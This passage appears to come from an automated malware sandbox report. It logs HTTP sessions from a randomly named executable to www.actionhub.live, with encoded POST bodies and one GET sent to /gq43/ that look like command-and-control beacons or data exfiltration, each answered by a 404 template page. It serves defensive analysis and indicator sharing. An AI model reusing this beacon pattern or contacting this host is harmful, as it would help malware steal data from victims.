                                                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                                              Jan 14, 2025 12:02:20.035790920 CET448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                                              Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                                              Jan 14, 2025 12:02:20.036072969 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                                              Jan 14, 2025 12:02:20.040666103 CET1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                                              Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.54947667.223.117.189802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:22.169286013 CET682OUTPOST /gq43/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.actionhub.live
                                                                              Origin: http://www.actionhub.live
                                                                              Referer: http://www.actionhub.live/gq43/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 73 39 31 48 6e 31 44 69 42 2f 78 46 64 55 6a 4e 48 32 37 47 4e 6f 71 48 48 47 43 53 48 6f 6d 50 38 6b 6a 43 6f 57 38 76 2f 4e 2b 64 4e 30 41 6f 37 6d 4d 2f 47 6f 53 6e 6e 73 48 73 39 42 67 65 6c 4c 31 53 77 52 61 6d 50 46 43 38 76 61 73 75 58 61 31 39 43 4f 6c 4d 34 54 4d 4b 73 6b 7a 58 4e 42 76 34 66 43 48 62 76 31 79 41 35 64 63 6e 62 56 61 57 56 61 67 71 35 31 37 70 62 31 44 6b 6d 6b 42 47 58 38 69 54 6b 6c 70 6a 68 30 6c 4d 66 70 37 31 47 4d 47 39 6e 30 46 75 59 6a 6d 48 30 74 6c 45 77 75 6b 53 42 76 61 49 52 33 43 39 57 55 52 38 39 39 42 65 4a 38 41 65 46 74 51 6e 6e 7a 72 4f 4f 75 4f 47 6e 51 4c 68 6b 4a 38 4d 66 51 69 58 50 4c 57 30 79 65 78 4c
                                                                              Data Ascii: t0A=s91Hn1DiB/xFdUjNH27GNoqHHGCSHomP8kjCoW8v/N+dN0Ao7mM/GoSnnsHs9BgelL1SwRamPFC8vasuXa19COlM4TMKskzXNBv4fCHbv1yA5dcnbVaWVagq517pb1DkmkBGX8iTklpjh0lMfp71GMG9n0FuYjmH0tlEwukSBvaIR3C9WUR899BeJ8AeFtQnnzrOOuOGnQLhkJ8MfQiXPLW0yexL
                                                                              Jan 14, 2025 12:02:22.746599913 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 11:02:22 GMT
                                                                              Server: Apache
                                                                              Content-Length: 32106
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                              Jan 14, 2025 12:02:22.746659994 CET1236INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                                              Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
                                                                              Jan 14, 2025 12:02:22.746695995 CET1236INData Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                              Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
                                                                              Jan 14, 2025 12:02:22.746740103 CET1236INData Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c
                                                                              Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
                                                                              Jan 14, 2025 12:02:22.746774912 CET896INData Raw: 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62 6c 65 73 20 54 65 6d 70 6c 61 74 65 22 20 63
                                                                              Data Ascii: ndex.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-con
                                                                              Jan 14, 2025 12:02:22.746808052 CET1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                                              Jan 14, 2025 12:02:22.746841908 CET224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul c
                                                                              Jan 14, 2025 12:02:22.746871948 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: lass="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a cla
                                                                              Jan 14, 2025 12:02:22.746905088 CET224INData Raw: 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: ="header2-dark.html">Header 2 Dark</a></li> </ul> </li> <li><a c
                                                                              Jan 14, 2025 12:02:22.746941090 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                                              Jan 14, 2025 12:02:22.752034903 CET1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                                              Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.54947767.223.117.189802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:24.708631039 CET1699OUTPOST /gq43/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.actionhub.live
                                                                              Origin: http://www.actionhub.live
                                                                              Referer: http://www.actionhub.live/gq43/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 73 39 31 48 6e 31 44 69 42 2f 78 46 64 55 6a 4e 48 32 37 47 4e 6f 71 48 48 47 43 53 48 6f 6d 50 38 6b 6a 43 6f 57 38 76 2f 4e 6d 64 4e 43 4d 6f 39 31 6b 2f 42 6f 53 6e 71 4d 48 76 39 42 68 4f 6c 4c 64 57 77 52 65 51 50 47 32 38 75 35 55 75 41 37 31 39 4a 4f 6c 4d 77 7a 4d 50 6f 6b 7a 47 4e 42 66 38 66 44 33 62 76 31 79 41 35 66 45 6e 66 41 36 57 58 61 67 70 2b 31 37 74 66 31 44 49 6d 67 74 38 58 2f 50 6f 6c 57 78 6a 69 55 31 4d 61 62 54 31 4f 4d 48 62 33 6b 46 32 59 69 61 6d 30 74 35 79 77 76 51 34 42 74 61 49 52 52 58 35 45 55 74 31 38 73 6c 41 47 2b 56 2b 51 64 55 57 35 79 2b 30 46 65 4f 6c 6f 67 6a 76 6a 75 34 51 64 54 66 4e 54 4e 71 44 34 37 67 5a 64 36 38 44 34 74 54 54 69 75 58 58 6f 66 69 67 32 68 39 30 59 4b 35 58 69 4d 49 78 43 75 52 6e 79 41 53 51 79 2f 4d 43 66 67 70 62 6b 56 70 61 6e 51 53 68 74 41 68 63 69 57 35 71 38 61 50 48 6a 33 30 4a 47 58 77 59 6c 75 46 48 32 51 2b 4a 6f 35 31 74 45 6d 79 56 2f 77 36 5a 31 74 57 57 46 67 31 52 78 67 52 48 38 59 47 31 6b 2b 6e 46 49 6e [TRUNCATED]
                                                                              Data Ascii: t0A=s91Hn1DiB/xFdUjNH27GNoqHHGCSHomP8kjCoW8v/NmdNCMo91k/BoSnqMHv9BhOlLdWwReQPG28u5UuA719JOlMwzMPokzGNBf8fD3bv1yA5fEnfA6WXagp+17tf1DImgt8X/PolWxjiU1MabT1OMHb3kF2Yiam0t5ywvQ4BtaIRRX5EUt18slAG+V+QdUW5y+0FeOlogjvju4QdTfNTNqD47gZd68D4tTTiuXXofig2h90YK5XiMIxCuRnyASQy/MCfgpbkVpanQShtAhciW5q8aPHj30JGXwYluFH2Q+Jo51tEmyV/w6Z1tWWFg1RxgRH8YG1k+nFIn9IB0npJatKH9s72WJsuq7rTDTHGBJhNHqK1YQ/7etZDKTHsp6vytpHfPR78Lq6i7snvCKIYIVDapGsdvNaPlTlOapineoBFeFBLyZW8ZNs/dGbTctygUOr2k/QBSQ59SShoPj5VEov0QzeeQUYhQE6SQ868a8QFQB82U0BtXBjCcUcb1rPyO/JIPTIofsTfWIqSPv3g4AXFAw0UJSDJuIVNOKjyz849VSSDYV8mCQoMdCGEMHKzm2xAlIdPRlDX2bnGBN0N+AUglSqDCJniTAF4ZxqsM/XbnQmxsT4COzGKzGR1O7Cn/zNc8wdGkyfU29pPvEcCvf2I3BYGbqOmXFqB0cWFUVhuNObSU46ipJFF8OboGyz4KBiIBkEIZ+WMt7RK9iFkvHewewcHqp5Vx/tUmcwoQW/S0qDqOU+RAs8BIbS2NfHkhPx7HpDmLrG5VLp0o/INHyfaR69WVW0ztwoKts+R24QnURB8o/jMJntXPQ248XvFLZbykXqCbkv1FY9gjtlR79U5z+2yT7d1DXluHcGjL5+4HOnPh1yvlOSsoFkRxByVT+EioStbFkSOHgTu3GhCuhEvNvaC08JCtYF0ZniyOuub8g5V8z5KKOMEjeuEu8yVvd+yfGRN474156Ygx6BM7xuZHhY2ujQjgn0kKlGC0Oxp7fl [TRUNCATED]
                                                                              Jan 14, 2025 12:02:25.282552004 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 11:02:25 GMT
                                                                              Server: Apache
                                                                              Content-Length: 32106
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                              Jan 14, 2025 12:02:25.282625914 CET1236INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                                              Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
                                                                              Jan 14, 2025 12:02:25.282660961 CET448INData Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                              Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
                                                                              Jan 14, 2025 12:02:25.282694101 CET1236INData Raw: 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 69 64 3d 22 74 6f 70 2d 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32
                                                                              Data Ascii: "container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn btn-secondary dropdown-toggle border-0 bg-transparent font-13 la
                                                                              Jan 14, 2025 12:02:25.282727957 CET1236INData Raw: 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61 6e 3e 20 50 68 6f 6e 65 20 3a 20 20 28 38 38 38 29 20 36 30 30 30 20 36 30 30 30 20 2d 20 28 38 38 38 29 20 36 30 30 30 20 36 30 30 30 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: les-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconemail"></
                                                                              Jan 14, 2025 12:02:25.282758951 CET448INData Raw: 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 66 61 62 6c 65
                                                                              Data Ascii: utton> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav"> <li class="nav-item dropdown">
                                                                              Jan 14, 2025 12:02:25.282793045 CET1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                                              Jan 14, 2025 12:02:25.282821894 CET224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul c
                                                                              Jan 14, 2025 12:02:25.282855988 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: lass="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a cla
                                                                              Jan 14, 2025 12:02:25.282890081 CET224INData Raw: 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: ="header2-dark.html">Header 2 Dark</a></li> </ul> </li> <li><a c
                                                                              Jan 14, 2025 12:02:25.287842035 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.54947867.223.117.189802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:27.254400969 CET396OUTGET /gq43/?t0A=h/dnkFjaM/BlMTbeYCbPPPvCOUuyeqTz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOG85h61EUnTrHdBHCQyPsxSiY4d4RTFSWTaZW3nKuaFCelg==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.actionhub.live
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:27.851429939 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 11:02:27 GMT
                                                                              Server: Apache
                                                                              Content-Length: 32106
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
